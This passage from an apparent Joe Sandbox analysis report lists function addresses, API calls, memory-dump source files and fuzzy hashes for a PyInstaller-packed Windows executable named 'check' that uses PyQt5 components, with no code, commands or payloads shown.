                                                                                                                                                                                                                                          • Instruction ID: a8802aae51cac424f400f2d529e3d3349466e64df339524e8b9acd597a08d3cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C021D710B18E8201FE517F5598D437D96829F847B0F8843B4DB1E477C5EEECA449C324
                                                                                                                                                                                                                                          Function 00007FF71250BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                          • Instruction ID: 807d283c6d46c8578195bd9ad7c5dd053b7dc14f7b4dbc7905097ca23d2b7aca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B41D932918A4187EA34AF15A9C117DF3A0EF55760F900271DB8E437D1EFACE406CB64
                                                                                                                                                                                                                                          Function 00007FF7124F7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                          • Opcode ID: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
                                                                                                                                                                                                                                          • Instruction ID: dc2fab82c7131c1c93b3e53a6d7214cbf5fb84bef2b2eaf11938beafa19e844f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 479405c7ef634ee4bdd4ed85459738d9743f05c8c4b8da07aaad499d404441fa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F621B421B18E614AFB10BB2668443BAD641BF85BE4FC94430EF0C0BB86DEBDE459C614
                                                                                                                                                                                                                                          Function 00007FF71250B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                          • Instruction ID: 2ae686ea682cbb24d85f2482c8eb0fa15b5478519b761845d40d3db79d611166
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2313E22E18E0285E6117F558CC137DAA90AB80BB4FC145B5EA5D473D2FEFCA449C739
                                                                                                                                                                                                                                          Function 00007FF712505F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction ID: 47145432ae132e9ac4b2a32f75bf4bfb0f4d69de619122aa562669d37b36c054
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7118731A1CA4141EA60BF11A88017DE664FF85BA8FC444B1FB8C57B96EFBCD404C768
                                                                                                                                                                                                                                          Function 00007FF89D9BB4D0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??0QPainter@@QEAA@PEAVQPaintDevice@@@Z.QT5GUI ref: 00007FF89D9BB593
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Device@@@PaintPainter@@malloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 45773141-0
                                                                                                                                                                                                                                          • Opcode ID: b82bc66c56b52707f45d0deaa57a676eb05b34faaac532d0dbf26db8a7b54cf3
                                                                                                                                                                                                                                          • Instruction ID: a12e3e8aa216b6d5b5e0f4f55f367061310cdbd6bbcad3c1ed64c05f5344cbfc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b82bc66c56b52707f45d0deaa57a676eb05b34faaac532d0dbf26db8a7b54cf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25211D33A08B8185EB608B12F44126E67A5FB88FD4F488135EECE57B68EF3CE1518704
                                                                                                                                                                                                                                          Function 00007FF712516354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                          • Instruction ID: 04c60779a7acf341c2b25f8d8cfde95d22987273b5447e8dc857f69cba0c99e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED218332718E418ADB61AF18D4C1379B6A0FB84BA4F944234E65D876D9DFBCD405CB20
                                                                                                                                                                                                                                          Function 00007FF7125003BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction ID: 453b067e982c6c7cc91ed70bd367d86f8aedca887b957ffd0331b3c204c0de48
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901A121A08F4580EA04FF529D811A9E691BF85FF0F8846B1EE5C23BD6EEBCD405C318
                                                                                                                                                                                                                                          Function 00007FF7124F8E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF7124F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7124F45F4,00000000,00007FF7124F1985), ref: 00007FF7124F93C9
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00007FF7124F6476,?,00007FF7124F336E), ref: 00007FF7124F8EA2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2592636585-0
                                                                                                                                                                                                                                          • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                          • Instruction ID: af033703ff5f0946069bb9d2f29c192534d3b6b4dae2061a525dcc20001f5da8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D08C11B24A4542EB54BB6BBA866399252AB8DBD0F888035EE0D03B4AEC3CC0958B00
                                                                                                                                                                                                                                          Function 00007FF71250D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF712500C90,?,?,?,00007FF7125022FA,?,?,?,?,?,00007FF712503AE9), ref: 00007FF71250D63A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                          • Instruction ID: 0c188388f099706162224971c2fc7f0893b8cb9d8028ba0a028c3cc5c331252d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70F0FE11B1AA4645FE547FB15CD167992909F84BB0F8807B0DD2E852C2FEACA488C634

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 00007FF7124F89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741396506.00007FF7124F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741463046.00007FF71251B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF71252E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741496293.00007FF712531000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2741556409.00007FF712534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                          • Instruction ID: de895dd2365ba0ef98c58d2bfce7aa97faa4e608715dfdfbf80a4aa30cc44fd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DD15432B08E9286FB10AF34E8942ADB760FF84768F800235DE5D46A95DFBCD559C710
                                                                                                                                                                                                                                          Function 00007FF89D94FE60 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$A@$$V0@@$?loadDocument@@Resource@TextUrl@@@
                                                                                                                                                                                                                                          • String ID: BiJ9$QTextDocument$loadResource$loadResource(self, type: int, name: QUrl) -> Any
                                                                                                                                                                                                                                          • API String ID: 670874972-1845412488
                                                                                                                                                                                                                                          • Opcode ID: 20c4205221668f101a6e2e80cf5dcd6513339ad9275bfb161c5680ce1f671623
                                                                                                                                                                                                                                          • Instruction ID: 9683f4fc76ed08aa0fe94b53ef6f32e283f2ee753ad3e52d5a5e24f3e5bef1e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20c4205221668f101a6e2e80cf5dcd6513339ad9275bfb161c5680ce1f671623
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48410D37608A8686DA608B11E4447AAA3A4FB85FD4F444032DACE43769EF3CE059CB04
                                                                                                                                                                                                                                          Function 00007FF89ECA1950 Relevance: 13.9, APIs: 9, Instructions: 431COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mem_SubtypeType_$DataFreeFromKindMallocUnicode_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3500989990-0
                                                                                                                                                                                                                                          • Opcode ID: 76cdbbed4ec85edb5246489e997a29ce274d103f94b2efc47d71435fe755d074
                                                                                                                                                                                                                                          • Instruction ID: 6f2f38ea689f420b55a4382cc396db467cc8e22d78d3ae79097dc72e3d6159af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76cdbbed4ec85edb5246489e997a29ce274d103f94b2efc47d71435fe755d074
